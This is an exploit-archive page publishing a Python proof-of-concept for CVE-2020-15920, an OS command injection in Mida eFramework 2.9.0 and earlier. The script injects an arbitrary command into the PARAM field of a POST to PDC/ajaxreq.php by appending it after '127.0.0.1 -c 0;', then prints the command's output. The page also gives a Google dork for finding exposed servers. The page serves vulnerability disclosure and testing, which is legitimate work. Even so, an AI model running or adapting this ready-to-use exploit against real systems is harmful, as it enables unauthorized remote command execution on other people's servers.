Mida eFramework 2.9.0 Remote Code Execution

Mida eFramework 2.9.0 Remote Code Execution: Posted Aug 27, 2020; Authored by elbae; Mida eFramework version 2.9.0 suffers from a remote code execution vulnerability.; tags | exploit, remote, code execution; advisories | CVE-2020-15920; SHA-256 | 1d91860562323de0b96d48e3fab2bd5c3cff83336de0debd04431d028e64421a; Download | Favorite | View

Mida eFramework 2.9.0 Remote Code Execution

# Exploit Title: Mida eFramework 2.9.0 - Remote Code Execution
# Google Dork: Server: Mida eFramework
# Date: 2020-08-27
# Exploit Author: elbae
# Vendor Homepage: https://www.midasolutions.com/
# Software Link: http://ova-efw.midasolutions.com/
# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
# Version: <= 2.9.0
# CVE : CVE-2020-15920


#! /usr/bin/python3
# -*- coding: utf-8 -*-

import argparse
import requests
import subprocess
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def print_disclaimer():
   print("""
    ---------------------
    Disclaimer:
    1) For testing purpose only.
    2) Do not attack production environments.
    3) Intended for educational purposes only and cannot be used for law
violation or personal gain.
    4) The author is not responsible for any possible harm caused by this
material.
    ---------------------""")


def print_info():
   print("""
[*] PoC exploit for Mida eFramework <= 2.9.0 PDC (CVE-2020-15920)
[*] Reference:
https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
[*] Vulnerability: OS Command Injection Remote Code Execution Vulnerability
(RCE) in PDC/ajaxreq.php
    Version\t< 2.9.0\t./CVE-2020-15920
http://192.168.1.60:8090/PDC/ajaxreq.php id
    Version\t2.9.0\t./CVE-2020-15920 https://192.168.1.60/PDC/ajaxreq.php
id """)

def pwn(url,cmd):
   running = """
[*] Target URL: {0}
[*] Command: {1}
   """
   print(running.format(url,cmd))
   data = {
      "DIAGNOSIS":"PING",
      "PARAM":"127.0.0.1 -c 0; {0}".format(cmd)
   }
   r = requests.post(url,data=data,verify=False)
   line = "[*]"+"-"*20+" Output " + "-" *20 +"[*]"
   pretty_output = r.text.replace('<br>','\n')
   print(line+"\n{0}\n".format(pretty_output)+line)

def main():
   print_info()
   print_disclaimer()
   parser = argparse.ArgumentParser()
   parser.add_argument("target", type=str, help="the complete target URL")
   parser.add_argument("cmd", type=str, help="the command you want to run")
   args = parser.parse_args()
   pwn(args.target, args.cmd)

if __name__ == '__main__':
   main()

Top Authors In Last 30 Days

Red Hat 248 files
Ubuntu 87 files
Gentoo 31 files
Debian 19 files
tmrswrr 10 files
Sina Kheirkhah 7 files
Rodolfo Tavares 4 files
bRpsd 4 files
Google Security Research 3 files
jheysel-r7 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,080)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,409)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,312)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,667)
UNIX (9,427)
UnixWare (187)
Windows (6,666)
Other

Mida eFramework 2.9.0 Remote Code Execution

Mida eFramework 2.9.0 Remote Code Execution

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Mida eFramework 2.9.0 Remote Code Execution

Share This

Mida eFramework 2.9.0 Remote Code Execution

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems